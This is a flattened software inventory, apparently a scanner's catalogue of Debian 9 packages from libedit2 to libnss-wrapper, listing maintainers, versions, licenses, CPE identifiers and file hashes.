cpe:2.3:a:libedit2:libedit2:3.1-20160903-3:*:*:*:*:*:*:* pkg:deb/debian/libedit2@3.1-20160903-3?arch=amd64&upstream=libedit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libedit2/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libedit2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 241 libedit Debian util-linux Maintainers <ah-util-linux@debian.org> libfdisk1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libfdisk1:libfdisk1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libfdisk1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libfdisk1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libfdisk1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 469 util-linux Debian GCC Maintainers <debian-gcc@lists.debian.org> libffi6 3.2.1-6 GPL cpe:2.3:a:libffi6:libffi6:3.2.1-6:*:*:*:*:*:*:* pkg:deb/debian/libffi6@3.2.1-6?arch=amd64&upstream=libffi&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libffi6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libffi6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 56 libffi Debian GCC Maintainers <debian-gcc@lists.debian.org> libgcc1 1:6.3.0-18+deb9u1 Artistic GFDL-1.2-only GPL GPL-2.0-only GPL-3.0-only 
cpe:2.3:a:libgcc1:libgcc1:1\:6.3.0-18\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libgcc1@1:6.3.0-18+deb9u1?arch=amd64&upstream=gcc-6%406.3.0-18+deb9u1&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gcc-6-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libgcc1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 108 gcc-6 6.3.0-18+deb9u1 Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libgcrypt20 1.7.6-2+deb9u4 GPL-2.0-only LGPL cpe:2.3:a:libgcrypt20:libgcrypt20:1.7.6-2\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libgcrypt20@1.7.6-2+deb9u4?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libgcrypt20/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libgcrypt20:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1266 Debian QA Group <packages@qa.debian.org> libgdbm3 1.8.3-14 GPL-2.0-only cpe:2.3:a:libgdbm3:libgdbm3:1.8.3-14:*:*:*:*:*:*:* pkg:deb/debian/libgdbm3@1.8.3-14?arch=amd64&upstream=gdbm&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libgdbm3/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libgdbm3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 68 gdbm Debian Science Team <debian-science-maintainers@lists.alioth.debian.org> libgmp10 2:6.1.2+dfsg-1+deb9u1 GPL GPL-2.0-only GPL-3.0-only LGPL-3.0-only cpe:2.3:a:libgmp10:libgmp10:2\:6.1.2\+dfsg-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libgmp10@2:6.1.2+dfsg-1+deb9u1?arch=amd64&upstream=gmp&distro=debian-9 
dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libgmp10/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libgmp10:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 568 gmp Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libgnutls30 3.5.8-5+deb9u6 CC0 GFDL-1.3-only GPL GPL-3.0-only LGPL LGPL-3.0-only LGPL2.1 The cpe:2.3:a:libgnutls30:libgnutls30:3.5.8-5\+deb9u6:*:*:*:*:*:*:* pkg:deb/debian/libgnutls30@3.5.8-5+deb9u6?arch=amd64&upstream=gnutls28&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libgnutls30/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libgnutls30:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2429 gnutls28 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> libgpg-error0 1.26-2 GPL-2.1+ LGPL-2.1-only cpe:2.3:a:libgpg-error0:libgpg-error0:1.26-2:*:*:*:*:*:*:* pkg:deb/debian/libgpg-error0@1.26-2?arch=amd64&upstream=libgpg-error&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libgpg-error0:libgpg_error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg_error0:libgpg-error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg_error0:libgpg_error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg:libgpg-error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg:libgpg_error0:1.26-2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libgpg-error0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libgpg-error0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 572 libgpg-error Sam Hartman <hartmans@debian.org> libgssapi-krb5-2 
1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libgssapi-krb5-2:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libgssapi-krb5-2@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libgssapi-krb5-2:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5_2:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5_2:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi-krb5:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi-krb5:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libgssapi-krb5-2/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libgssapi-krb5-2:amd64.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libgssapi-krb5-2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 423 krb5 Magnus Holmgren <holmgren@debian.org> libhogweed4 3.3-1+deb9u1 GAP GPL GPL-2.0-only GPL-2.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-or-later other public-domain cpe:2.3:a:libhogweed4:libhogweed4:3.3-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libhogweed4@3.3-1+deb9u1?arch=amd64&upstream=nettle&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libnettle6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libhogweed4:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 232 
nettle Laszlo Boszormenyi (GCS) <gcs@debian.org> libicu57 57.1-6+deb9u5 cpe:2.3:a:libicu57:libicu57:57.1-6\+deb9u5:*:*:*:*:*:*:* pkg:deb/debian/libicu57@57.1-6+deb9u5?arch=amd64&upstream=icu&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libicu57/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libicu57:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 30043 icu Debian Libidn Team <help-libidn@gnu.org> libidn11 1.33-1+deb9u1 GAP GFDL-1.3-only GFDL-1.3+ GPL-2.0-only GPL-3.0-only GPL-3.0-or-later LGPL-2.0-only LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later cpe:2.3:a:libidn11:libidn11:1.33-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libidn11@1.33-1+deb9u1?arch=amd64&upstream=libidn&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libidn11/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libidn11:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 307 libidn Debian Perl Group <pkg-perl-maintainers@lists.alioth.debian.org> libjson-perl 2.90-1 Artistic GPL-1.0-only GPL-1.0-or-later cpe:2.3:a:libjson-perl:libjson-perl:2.90-1:*:*:*:*:*:*:* pkg:deb/debian/libjson-perl@2.90-1?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libjson-perl:libjson_perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson_perl:libjson-perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson_perl:libjson_perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson:libjson-perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson:libjson_perl:2.90-1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libjson-perl/copyright 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libjson-perl.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 229 Sam Hartman <hartmans@debian.org> libk5crypto3 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libk5crypto3:libk5crypto3:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libk5crypto3@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libk5crypto3/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libk5crypto3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 311 krb5 Christian Kastner <ckk@debian.org> libkeyutils1 1.5.9-9 GPL-2.0-only GPL-2.0-or-later LGPL-2.0-only LGPL-2.0-or-later cpe:2.3:a:libkeyutils1:libkeyutils1:1.5.9-9:*:*:*:*:*:*:* pkg:deb/debian/libkeyutils1@1.5.9-9?arch=amd64&upstream=keyutils&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libkeyutils1/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libkeyutils1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 36 keyutils Sam Hartman <hartmans@debian.org> libkrb5-3 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libkrb5-3:libkrb5-3:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libkrb5-3@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libkrb5-3:libkrb5_3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5_3:libkrb5-3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5_3:libkrb5_3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5:libkrb5-3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5:libkrb5_3:1.15-1\+deb9u3:*:*:*:*:*:*:* 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libkrb5-3/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libkrb5-3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1026 krb5 Sam Hartman <hartmans@debian.org> libkrb5support0 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libkrb5support0:libkrb5support0:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libkrb5support0@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libkrb5support0/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libkrb5support0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 159 krb5 Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libksba8 1.3.5-2 GPL-3.0-only cpe:2.3:a:libksba8:libksba8:1.3.5-2:*:*:*:*:*:*:* pkg:deb/debian/libksba8@1.3.5-2?arch=amd64&upstream=libksba&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libksba8/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libksba8:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 264 libksba Debian OpenLDAP Maintainers <pkg-openldap-devel@lists.alioth.debian.org> libldap-2.4-2 2.4.44+dfsg-5+deb9u8 cpe:2.3:a:libldap-2.4-2:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* pkg:deb/debian/libldap-2.4-2@2.4.44+dfsg-5+deb9u8?arch=amd64&upstream=openldap&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libldap-2.4-2:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4_2:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* 
cpe:2.3:a:libldap_2.4_2:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap-2.4:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap-2.4:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libldap-2.4-2/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libldap-2.4-2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 510 openldap Debian OpenLDAP Maintainers <pkg-openldap-devel@lists.alioth.debian.org> libldap-common 2.4.44+dfsg-5+deb9u8 cpe:2.3:a:libldap-common:libldap-common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* pkg:deb/debian/libldap-common@2.4.44+dfsg-5+deb9u8?arch=all&upstream=openldap&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libldap-common:libldap_common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_common:libldap-common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_common:libldap_common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap-common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap_common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libldap-common/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libldap-common.conffiles sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libldap-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 109 openldap LLVM Packaging Team 
<pkg-llvm-team@lists.alioth.debian.org> libllvm6.0 1:6.0-1~bpo9+1 ARM Apple BSD-3-Clause BSD-3-Clause Expat LLVM MIT NCSA Polly Python U-OF-I-BSD-LIKE public-domain solar-public-domain cpe:2.3:a:libllvm6.0:libllvm6.0:1\:6.0-1\~bpo9\+1:*:*:*:*:*:*:* pkg:deb/debian/libllvm6.0@1:6.0-1~bpo9+1?arch=amd64&upstream=llvm-toolchain-6.0&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libllvm6.0/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libllvm6.0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 59860 llvm-toolchain-6.0 Nobuhiro Iwamatsu <iwamatsu@debian.org> liblz4-1 0.0~r131-2+deb9u1 BSD-2-Clause GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:liblz4-1:liblz4-1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/liblz4-1@0.0~r131-2+deb9u1?arch=amd64&upstream=lz4&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:liblz4-1:liblz4_1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4_1:liblz4-1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4_1:liblz4_1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4:liblz4-1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4:liblz4_1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/liblz4-1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/liblz4-1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 92 lz4 Jonathan Nieder <jrnieder@gmail.com> liblzma5 5.2.2-1.2+deb9u1 Autoconf GPL-2.0-only GPL-2.0-or-later GPL-3.0-only LGPL-2.0-only LGPL-2.1-only LGPL-2.1-or-later PD PD-debian config-h noderivs permissive-fsf permissive-nowarranty probably-PD cpe:2.3:a:liblzma5:liblzma5:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* 
pkg:deb/debian/liblzma5@5.2.2-1.2+deb9u1?arch=amd64&upstream=xz-utils&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/liblzma5/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/liblzma5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 338 xz-utils Debian util-linux Maintainers <ah-util-linux@debian.org> libmount1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libmount1:libmount1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libmount1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libmount1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libmount1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 403 util-linux Craig Small <csmall@debian.org> libncurses5 6.0+20161126-1+deb9u2 cpe:2.3:a:libncurses5:libncurses5:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libncurses5@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libtinfo5/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libncurses5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 287 ncurses Craig Small <csmall@debian.org> libncursesw5 6.0+20161126-1+deb9u2 cpe:2.3:a:libncursesw5:libncursesw5:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* 
pkg:deb/debian/libncursesw5@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libtinfo5/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libncursesw5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 347 ncurses Magnus Holmgren <holmgren@debian.org> libnettle6 3.3-1+deb9u1 GAP GPL GPL-2.0-only GPL-2.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-or-later other public-domain cpe:2.3:a:libnettle6:libnettle6:3.3-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libnettle6@3.3-1+deb9u1?arch=amd64&upstream=nettle&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libnettle6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libnettle6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 357 nettle Eric Dorland <eric@debian.org> libnpth0 1.3-1 GPL-2.0-only GPL-2.0-or-later LGPL-3.0-only LGPL-3.0-or-later cpe:2.3:a:libnpth0:libnpth0:1.3-1:*:*:*:*:*:*:* pkg:deb/debian/libnpth0@1.3-1?arch=amd64&upstream=npth&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libnpth0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libnpth0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 43 npth Debian SSSD Team <pkg-sssd-devel@lists.alioth.debian.org> libnss-wrapper 1.1.3-1 BSD-3-clauses cpe:2.3:a:libnss-wrapper:libnss-wrapper:1.1.3-1:*:*:*:*:*:*:* pkg:deb/debian/libnss-wrapper@1.1.3-1?arch=amd64&upstream=nss-wrapper&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb 
